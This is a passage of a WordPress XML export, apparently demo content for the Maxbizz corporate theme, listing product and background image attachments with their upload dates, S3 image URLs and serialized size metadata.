		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/product-11.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/product-11.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:570;s:6:"height";i:599;s:4:"file";s:24:"2020/10/product-11.png";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:24:"product-11-1-285x300.png";s:5:"width";i:285;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"product-11-1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"product-11-1-570x400.png";s:5:"width";i:570;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>product-1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/product-1/</link>
		<pubDate>Mon, 05 Oct 2020 10:11:06 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/product-1.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1272</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 10:11:06]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 10:11:06]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[product-1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/product-1.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/product-1.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:570;s:6:"height";i:599;s:4:"file";s:23:"2020/10/product-1.png";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:23:"product-1-1-285x300.png";s:5:"width";i:285;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"product-1-1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"product-1-1-570x400.png";s:5:"width";i:570;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>product-2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/product-2/</link>
		<pubDate>Mon, 05 Oct 2020 10:11:25 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/product-2.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1273</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 10:11:25]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 10:11:25]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[product-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/product-2.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/product-2.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:570;s:6:"height";i:599;s:4:"file";s:23:"2020/10/product-2.png";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:23:"product-2-1-285x300.png";s:5:"width";i:285;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"product-2-1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"product-2-1-570x400.png";s:5:"width";i:570;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>product-3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/product-3/</link>
		<pubDate>Mon, 05 Oct 2020 10:11:30 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/product-3.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1274</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 10:11:30]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 10:11:30]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[product-3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/product-3.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/product-3.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:570;s:6:"height";i:599;s:4:"file";s:23:"2020/10/product-3.png";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:23:"product-3-1-285x300.png";s:5:"width";i:285;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"product-3-1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"product-3-1-570x400.png";s:5:"width";i:570;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>product-4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/product-4/</link>
		<pubDate>Mon, 05 Oct 2020 10:12:52 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/product-4.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1275</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 10:12:52]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 10:12:52]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[product-4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/product-4.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/product-4.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:570;s:6:"height";i:599;s:4:"file";s:23:"2020/10/product-4.png";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:23:"product-4-1-285x300.png";s:5:"width";i:285;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"product-4-1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"product-4-1-570x400.png";s:5:"width";i:570;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>product-5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/product-5/</link>
		<pubDate>Mon, 05 Oct 2020 10:12:54 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/product-5.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1276</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 10:12:54]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 10:12:54]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[product-5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/product-5.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/product-5.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:570;s:6:"height";i:599;s:4:"file";s:23:"2020/10/product-5.png";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:23:"product-5-1-285x300.png";s:5:"width";i:285;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"product-5-1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"product-5-1-570x400.png";s:5:"width";i:570;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>product-6</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/product-6/</link>
		<pubDate>Mon, 05 Oct 2020 10:13:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/product-6.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1277</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 10:13:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 10:13:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[product-6]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/product-6.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/product-6.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:570;s:6:"height";i:599;s:4:"file";s:23:"2020/10/product-6.png";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:23:"product-6-1-285x300.png";s:5:"width";i:285;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"product-6-1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"product-6-1-570x400.png";s:5:"width";i:570;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>product-7</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/product-7/</link>
		<pubDate>Mon, 05 Oct 2020 10:15:10 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/product-7.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1279</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 10:15:10]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 10:15:10]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[product-7]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/product-7.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/product-7.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:570;s:6:"height";i:599;s:4:"file";s:23:"2020/10/product-7.png";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:23:"product-7-1-285x300.png";s:5:"width";i:285;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"product-7-1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"product-7-1-570x400.png";s:5:"width";i:570;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>product-8</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/product-8/</link>
		<pubDate>Mon, 05 Oct 2020 10:15:16 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/product-8.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1280</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 10:15:16]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 10:15:16]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[product-8]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/product-8.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/product-8.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:570;s:6:"height";i:599;s:4:"file";s:23:"2020/10/product-8.png";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:23:"product-8-1-285x300.png";s:5:"width";i:285;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"product-8-1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"product-8-1-570x400.png";s:5:"width";i:570;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>product-9</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/product-9/</link>
		<pubDate>Mon, 05 Oct 2020 10:15:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/product-9.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1281</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 10:15:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 10:15:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[product-9]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/product-9.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/product-9.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:570;s:6:"height";i:599;s:4:"file";s:23:"2020/10/product-9.png";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:23:"product-9-1-285x300.png";s:5:"width";i:285;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"product-9-1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"product-9-1-570x400.png";s:5:"width";i:570;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-home2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/home/bg1-home2/</link>
		<pubDate>Tue, 20 Oct 2020 09:58:40 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-home2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1372</wp:post_id>
		<wp:post_date><![CDATA[2020-10-20 09:58:40]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-20 09:58:40]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-home2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-home2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/bg1-home2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:660;s:4:"file";s:21:"2020/10/bg1-home2.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:21:"bg1-home2-300x103.jpg";s:5:"width";i:300;s:6:"height";i:103;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg1-home2-1024x352.jpg";s:5:"width";i:1024;s:6:"height";i:352;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg1-home2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg1-home2-768x264.jpg";s:5:"width";i:768;s:6:"height";i:264;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg1-home2-1536x528.jpg";s:5:"width";i:1536;s:6:"height";i:528;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-home2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-home2-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"bg1-home2-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"bg1-home2-1200x660.jpg";s:5:"width";i:1200;s:6:"height";i:660;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg2-home2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/home/bg2-home2/</link>
		<pubDate>Wed, 21 Oct 2020 03:49:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg2-home2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
